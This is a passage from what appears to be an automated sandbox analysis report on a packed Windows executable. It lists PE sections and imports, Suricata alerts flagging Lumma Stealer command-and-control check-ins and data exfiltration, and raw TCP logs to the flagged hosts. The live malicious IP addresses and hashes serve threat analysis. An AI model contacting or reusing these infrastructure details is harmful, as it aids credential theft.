                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [edx+ecx], al
                                                                            add byte ptr [eax], al
                                                                            push es
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [0100000Ah], al
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [edx], al
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ecx], al
                                                                            add byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            adc byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            or ecx, dword ptr [edx]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            pushad
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            0x10000x580000x27e003c6ad73cdf4388c591f0d98fec986eaeFalse0.9980346297021944data7.976762047296123IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc 0x590000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            pbfjgcaa0x5b0000x2b00000x2afc0073acba10f8f33f064699555eb0b657f7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            kavtkaqy0x30b0000x10000x400c513871df9627758287adb8d65115f31False0.791015625data6.171291659649108IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .taggant0x30c0000x30000x2200525d79dc8bf6e332f97da80a5db69e15False0.06525735294117647DOS executable (COM)0.8459525400008026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                            Imports

                                                                            DLLImport
                                                                            kernel32.dlllstrcpy

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-10-29T14:11:21.150507+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749737188.114.97.3443TCP
                                                                            2024-10-29T14:11:21.150507+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749737188.114.97.3443TCP
                                                                            2024-10-29T14:11:22.357036+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749743188.114.97.3443TCP
                                                                            2024-10-29T14:11:22.357036+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749743188.114.97.3443TCP
                                                                            2024-10-29T14:11:29.347854+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749781188.114.97.3443TCP
                                                                            2024-10-29T14:11:38.584275+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749840188.114.97.3443TCP
                                                                            2024-10-29T14:11:39.524381+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.749847185.215.113.1680TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 29, 2024 14:11:20.015816927 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:20.015866041 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:20.015953064 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:20.020163059 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:20.020179033 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:20.642575026 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:20.642744064 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:20.646183968 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:20.646198988 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:20.646487951 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:20.694402933 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:20.695805073 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:20.695826054 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:20.695904970 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.150614023 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.150942087 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.151009083 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.152451038 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.152468920 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.152498960 CET49737443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.152506113 CET44349737188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.229562044 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.229604959 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.229681969 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.230009079 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.230025053 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.849339962 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.849554062 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.851227045 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.851257086 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.851650953 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:21.853015900 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.853055000 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:21.853128910 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357022047 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357079983 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357124090 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357196093 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357218027 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.357287884 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357326031 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.357387066 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357439041 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.357461929 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357568026 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357633114 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.357649088 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357763052 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.357815981 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.357830048 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.397557974 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.475255966 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.475462914 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.475539923 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.475559950 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.475652933 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.475722075 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.475737095 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.475883961 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.475950003 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.476037025 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.476037025 CET49743443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.476073027 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.476094007 CET44349743188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.658512115 CET49753443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.658608913 CET44349753188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:22.658711910 CET49753443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.659023046 CET49753443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:22.659073114 CET44349753188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:23.274041891 CET44349753188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:23.274183035 CET49753443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:23.275727034 CET49753443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:23.275775909 CET44349753188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:23.276794910 CET44349753188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:23.278336048 CET49753443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:23.278552055 CET49753443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:23.278599977 CET44349753188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:27.893183947 CET44349753188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:27.893408060 CET44349753188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:27.893465996 CET49753443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:28.090965986 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:28.091017008 CET44349781188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:28.091114998 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:28.091480970 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:28.091495037 CET44349781188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:28.712024927 CET44349781188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:28.712131023 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:28.723766088 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:28.723783016 CET44349781188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:28.724164963 CET44349781188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:28.728034973 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:28.728189945 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:28.728216887 CET44349781188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:28.728281021 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:28.728285074 CET44349781188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:29.347883940 CET44349781188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:29.348081112 CET44349781188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:29.348417044 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:29.348448992 CET49781443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:29.544670105 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:29.544719934 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:29.544795036 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:29.545118093 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:29.545130968 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:30.149719954 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:30.149842978 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:30.152028084 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:30.152056932 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:30.152328014 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:30.161319971 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:30.161469936 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:30.161498070 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:30.161554098 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:30.161565065 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:30.818243980 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:30.818334103 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:30.818387985 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:30.818517923 CET49788443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:30.818526983 CET44349788188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:31.271218061 CET49799443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:31.271258116 CET44349799188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:31.271322012 CET49799443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:31.271866083 CET49799443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:31.271874905 CET44349799188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:31.882846117 CET44349799188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:31.882961035 CET49799443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:31.887516975 CET49799443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:31.887571096 CET44349799188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:31.887810946 CET44349799188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:31.889075041 CET49799443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:31.889180899 CET49799443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:31.889194012 CET44349799188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:33.249408960 CET44349799188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:33.249511957 CET44349799188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:33.249635935 CET49799443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:33.249905109 CET49799443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:33.249938965 CET44349799188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:33.821913004 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:33.821954012 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:33.822030067 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:33.822360039 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:33.822371006 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.441112041 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.441242933 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.442662001 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.442679882 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.443073988 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.444813013 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.446125984 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.446170092 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.446343899 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.446436882 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.446588993 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.446711063 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.446856022 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.446976900 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.447144985 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.447261095 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.447427988 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.447485924 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.447513103 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.447570086 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.447660923 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.447735071 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.447782993 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.447873116 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.447943926 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.458066940 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.458290100 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.458345890 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:34.458379984 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.458410025 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.458542109 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:34.463382959 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:37.438523054 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:37.438626051 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:37.438736916 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:37.438905001 CET49815443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:37.438916922 CET44349815188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:37.452692986 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:37.452759027 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:37.452970028 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:37.453397989 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:37.453413963 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:38.064125061 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:38.064296961 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:38.080481052 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:38.080507994 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:38.080785990 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:38.093988895 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:38.094022036 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:38.094085932 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:38.584290028 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:38.584386110 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:38.584594011 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:38.584676981 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:38.584697008 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:38.584712982 CET49840443192.168.2.7188.114.97.3
                                                                            Oct 29, 2024 14:11:38.584719896 CET44349840188.114.97.3192.168.2.7
                                                                            Oct 29, 2024 14:11:38.586601973 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:38.592019081 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:38.592107058 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:38.592226028 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:38.600545883 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.524311066 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.524341106 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.524353981 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.524367094 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.524380922 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.524394035 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.524405003 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.524411917 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.524454117 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.525636911 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.525657892 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.525671005 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.525738001 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.525754929 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.525788069 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.529934883 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.529951096 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.529963017 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.529989958 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.569534063 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.679433107 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.679455042 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.679466009 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.679550886 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.680160999 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680172920 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680187941 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680206060 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680214882 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.680228949 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680236101 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.680246115 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680258036 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680265903 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.680278063 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680289984 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.680836916 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680883884 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.680923939 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680933952 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680946112 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.680960894 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.681030035 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.681067944 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:39.681721926 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.681735039 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:39.681745052 CET8049847185.215.113.16192.168.2.7
